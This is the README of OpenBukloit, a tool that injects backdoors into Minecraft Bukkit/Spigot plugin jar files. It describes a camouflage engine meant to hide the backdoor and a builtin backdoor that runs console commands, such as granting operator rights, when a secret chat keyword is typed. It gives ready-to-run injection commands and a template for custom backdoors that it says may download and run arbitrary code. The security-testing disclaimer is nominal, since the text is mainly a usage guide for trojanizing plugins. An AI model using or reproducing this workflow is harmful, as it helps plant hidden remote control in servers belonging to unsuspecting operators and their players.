OpenBukloit – Minecraft plugin backdoor injector
OpenBukloit is modern and powerful universal backdoor injector compatible with all Bukkit/Spigot/Paper/etc plugins. Its feature is ability to integrate with absolutely any plugin without the need to modify backdoor every time. Moreover, it provides powerful camouflage engine, which makes nearly impossible to find it without sufficient knowledge or advanced automated tools. OpenBukloit was developed to test the security systems of Minecraft servers, VoxelHax team is not responsible for its misuse.
This is a continuation of Bukloit project, taking into account all the problems of the previous project and a completely different approach to development.
OpenBukloit features
- Full support for Bukkit and it’s forks on any Minecraft version.
- Custom backdoor support.
- Automatic JDK downloading, so you don’t need to care about Java version compatibility.
- Powerful camouflage engine, which makes it harder to find backdoor in plugin.
Installation
In order to use OpenBukloit you must have any Java version installed (but not lower than 8). OpenBukloit jar can be downloaded from releases tab. OpenBukloit does not require any additional actions, just put jar file somewhere and use it from command line.
Usage
To run OpenBukloit, open command prompt in the directory where OpenBukloit jar is located and type:
java -jar OpenBukloit.jar
After jar file name you can pass some arguments to configure injector:
Short Argument | Long Argument | Description | Type |
---|---|---|---|
-e | –exploit | Path to custom .java or compiled .class file, that will be used as backdoor.By default uses builtin backdoor. | Value |
-m | –mode | Mode. Can be single/multiple.Default: multiple.In multiple mode, modifies all files in the specified folder. In single – only the specified file. | Value |
-i | –input | Path to input folder/file (mode dependent).Default: in (in.jar if mode is single). | Value |
-o | –output | Path to output folder/file (mode dependent).Default: out (out.jar if mode is single). | Value |
-r | –replace | Replace output file if it already exists. | Flag |
But these arguments are not enough to run OpenBukloit. You must also specify backdoor params. Because OpenBukloit supports injecting of custom backdoors, you must pass additional arguments that required by used backdoor.
Builtin exploit
By default, OpenBukloit injects builtin backdoor. It is a simple backdoor that allows you to execute any commands as console by writing special keyword before command in chat.
Builtin backdoor params:
Long Argument | Description |
---|---|
–key | Keyword, that triggers console command execution. |
Ingame usage for key set to “hackthisserver”:
hackthisserver op MyName
This message sent to chat will be executed as console command and give op to MyName player.
Here is some examples of using OpenBukloit with builtin backdoor:
- Patch all .jar files with the “#console” key from the “in” folder and save them into the “out” folder without replacement.
java -jar OpenBukloit.jar -m multiple -i "in" -o "out" --key "#console"
- Patch all files with the “hacktheserver” key from the “in” folder and save them into the “out” folder with replacement.
java -jar OpenBukloit.jar -m multiple -i "in" -o "out" --key "hacktheserver" -r
- Patch single file “PluginName.jar” with “#console” key and save it as “Output.jar” file with replacement.
java -jar OpenBukloit.jar -m single -i "PluginName.jar" -o "Output.jar" --key "#console" -r
Writing custom exploit
You can also write your own backdoor. It should be a class with public static void inject(JavaPlugin args)
method (JavaPlugin is from Bukkit API).
Here is a simple example:
import org.bukkit.plugin.java.JavaPlugin;
public class MyBackdoor {
public static void inject(JavaPlugin args) {
System.out.println("Hello, world!");
}
}
inject
method will be executed after plugin’s onEnable
method. You can do everything you want here, including downloading and running some arbitrary code from internet.
But you must know that there are some limitations:
- Currently, you can’t use nested classes, there is must be only one class in exploit file.
- You shouldn’t reference your exploit class inside it, like using it as method params, as a return value or as a field type.
You can take external params from command line, by using %placeholders%, thay will be replaced during injection:
import org.bukkit.plugin.java.JavaPlugin;
public class MyBackdoor {
public static void inject(JavaPlugin args) {
System.out.println("Hello, %name%!");
}
}
And then inject it with command:
java -jar OpenBukloit.jar -e MyBackdoor.java --name world
Note, that we can pass our backdoor to OpenBukloit without compiling, and it will automatically compile it with Spigot API in compiletime classpool.